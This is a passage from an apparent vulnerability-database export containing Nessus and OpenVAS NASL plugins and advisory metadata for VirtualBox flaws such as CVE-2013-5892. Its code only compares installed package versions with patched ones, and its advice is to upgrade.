value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=735410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/virtualbox\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2878\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the virtualbox packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source\npackage.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.1.18-dfsg-2+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"virtualbox\", reference:\"3.2.10-dfsg-1+squeeze2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-dbg\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-fuse\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", 
prefix:\"virtualbox-guest-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-utils\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-x11\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-dbg\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-fuse\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-utils\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-x11\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-qt\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-qt\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:31", "description": "The remote host is affected by the vulnerability described in GLSA-201401-13 
(VirtualBox: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Virtualbox. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A local attacker in a guest virtual machine may be able to escalate privileges or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-21T00:00:00", "type": "nessus", "title": "GLSA-201401-13 : VirtualBox: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3221", "CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0405", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:virtualbox", "p-cpe:/a:gentoo:linux:virtualbox-bin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-13.NASL", "href": "https://www.tenable.com/plugins/nessus/72052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-13.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72052);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-3221\", \"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0405\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_bugtraq_id(56045, 64900, 64905, 64909, 64911, 64913);\n script_xref(name:\"GLSA\", value:\"201401-13\");\n\n script_name(english:\"GLSA-201401-13 : VirtualBox: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-13\n(VirtualBox: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Virtualbox. 
Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A local attacker in a guest virtual machine may be able to escalate\n privileges or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All virtualbox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/virtualbox-4.2.22'\n All virtualbox-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=app-emulation/virtualbox-bin-4.2.22'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/virtualbox-bin\", unaffected:make_list(\"ge 4.2.22\"), vulnerable:make_list(\"lt 4.2.22\"))) flag++;\nif (qpkg_check(package:\"app-emulation/virtualbox\", unaffected:make_list(\"ge 4.2.22\"), vulnerable:make_list(\"lt 4.2.22\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VirtualBox\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-06-07T18:54:46", "description": "Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.", "cvss3": {}, "published": "2014-01-15T16:08:00", "type": "debiancve", "title": "CVE-2013-5892", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2014-01-15T16:08:00", "id": "DEBIANCVE:CVE-2013-5892", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5892", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-15T17:26:01", "description": "This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.", "cvss3": {}, "published": "2014-01-23T00:00:00", "type": "openvas", "title": "Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2020-05-12T00:00:00", "id": "OPENVAS:1361412562310804193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804193", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804193\");\n script_version(\"2020-05-12T13:57:17+0000\");\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-12 13:57:17 +0000 (Tue, 12 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-23 10:35:12 +0530 (Thu, 23 Jan 2014)\");\n script_name(\"Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to unspecified errors related to 'core' subcomponent.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local users to affect confidentiality,\n integrity, and availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle VM VirtualBox before version 3.2.20, before version 4.0.22, before\n version 4.1.30, before version 4.2.22 and before version 4.3.6 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56490\");\n script_xref(name:\"URL\", 
value:\"http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_oracle_virtualbox_detect_macosx.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list(\"cpe:/a:oracle:vm_virtualbox\", \"cpe:/a:sun:virtualbox\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.19\")||\n version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.21\")||\n version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.29\")||\n version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")||\n version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.5\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T17:26:48", "description": "This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.", "cvss3": {}, "published": "2014-01-23T00:00:00", "type": "openvas", "title": "Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2020-05-12T00:00:00", "id": "OPENVAS:1361412562310804192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Windows)\n#\n# 
Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804192\");\n script_version(\"2020-05-12T13:57:17+0000\");\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-12 13:57:17 +0000 (Tue, 12 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-23 10:29:12 +0530 (Thu, 23 Jan 2014)\");\n script_name(\"Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to unspecified errors related to 'core' subcomponent.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local users to affect confidentiality,\n integrity, and availability via unknown 
vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle VM VirtualBox before version 3.2.20, before version 4.0.22, before\n version 4.1.30, before version 4.2.22 and before version 4.3.6 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56490\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_win.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list(\"cpe:/a:oracle:vm_virtualbox\", \"cpe:/a:sun:virtualbox\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.19\")||\n version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.21\")||\n version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.29\")||\n version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")||\n version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.5\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:25", "description": "Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an 
information leak.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2878-1 (virtualbox - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702878", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2878.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2878-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702878\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_name(\"Debian Security Advisory DSA 2878-1 (virtualbox - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-13 00:00:00 +0100 (Thu, 13 Mar 2014)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2878.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"virtualbox on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source package.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.1.18-dfsg-2+deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nWe recommend that you upgrade your virtualbox packages.\");\n script_tag(name:\"summary\", value:\"Matthew Daley 
discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-dbg\", 
ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += 
